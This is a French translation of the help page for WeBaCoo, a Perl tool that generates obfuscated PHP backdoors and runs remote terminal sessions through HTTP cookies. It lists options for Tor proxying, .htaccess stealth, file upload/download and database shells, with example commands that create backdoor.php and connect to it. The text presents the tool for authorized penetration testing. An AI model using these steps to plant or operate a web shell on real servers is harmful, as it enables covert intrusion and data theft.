
Kit de script de cookie backdoor Web
| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Web Backdoor Cookie Script-Kit
Écrit par : Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis
L'outil est uniquement à des fins de test et ne peut être utilisé qu'avec un consentement explicite. Ne l'utilisez pas à des fins illégales.
Toute modification, changement ou altération de cette application est acceptable, cependant, toute publication publique utilisant ce code doit être approuvée par son créateur. Consultez le fichier LICENSE pour plus d'informations.
Si vous ne souhaitez pas installer "libio-socket-socks-perl" pour la fonctionnalité de proxy Tor, commentez la ligne 25 dans webacoo.pl
webacoo.pl [options]
Options : -g Générer le code de backdoor (-o est requis)
-f FONCTION Fonction système PHP à utiliser FONCTION 1: system (par défaut) 2: shell_exec 3: exec 4: passthru 5: popen
-o SORTIE Nom du fichier de sortie de la backdoor générée
-r Retourner le code de backdoor non obfusqué
-t Établir une connexion "terminal" distante (-u est requis)
-u URL URL de la backdoor
-e CMD Mode d'exécution d'une seule commande (-t et -u sont requis)
-m MÉTHODE Méthode HTTP à utiliser (par défaut "GET")
-c N_COOKIE Nom du cookie (par défaut : "M-cookie")
-d DÉLIM Délimiteur (par défaut : nouveau aléatoire à chaque requête)
-a AGENT User-agent de l'en-tête HTTP (par défaut existant)
-p PROXY Utiliser un proxy (tor, ip:port ou user:pass:ip:port)
-v NIVEAU Niveau de verbosité NIVEAU 0: aucune information supplémentaire (par défaut) 1: afficher les en-têtes HTTP 2: afficher les en-têtes HTTP + données
-l LOG Journaliser l'activité dans un fichier
-h Afficher l'aide et quitter
update Vérifier les mises à jour et les appliquer le cas échéant
Depuis la version 0.2.1, un support de modules d'extension a été ajouté pour fournir des fonctionnalités supplémentaires à WeBaCoo. En mode terminal, vous pouvez exécuter 'load' pour lister les modules disponibles et initialiser celui souhaité depuis la liste. En tapant 'unload', vous revenez au mode terminal initial.
Modules d'extension disponibles : o mysql-cli Module ligne de commande MySQL o psql-cli Module ligne de commande Postgres o upload Module de téléversement de fichier via HTTP Post o download Module de téléchargement de fichier via impression stdout avec 'od' et 'xxd' o stealth Module d'augmentation de furtivité via la gestion .htaccess
Créer une backdoor obfusquée 'backdoor.php' avec les paramètres par défaut ./webacoo.pl -g -o backdoor.php
Créer une backdoor non obfusquée 'raw-backdoor.php' en utilisant la fonction 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
Établir une connexion "terminal" avec l'hôte distant en utilisant la configuration par défaut ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
Établir une connexion "terminal" avec l'hôte distant tout en définissant quelques arguments ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
Établir une connexion "terminal" avec l'hôte distant via un proxy HTTP local ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
Établir une connexion "terminal" avec l'hôte distant via un proxy HTTP avec authentification de base ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Établir une connexion "terminal" avec l'hôte distant via Tor et journaliser l'activité ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt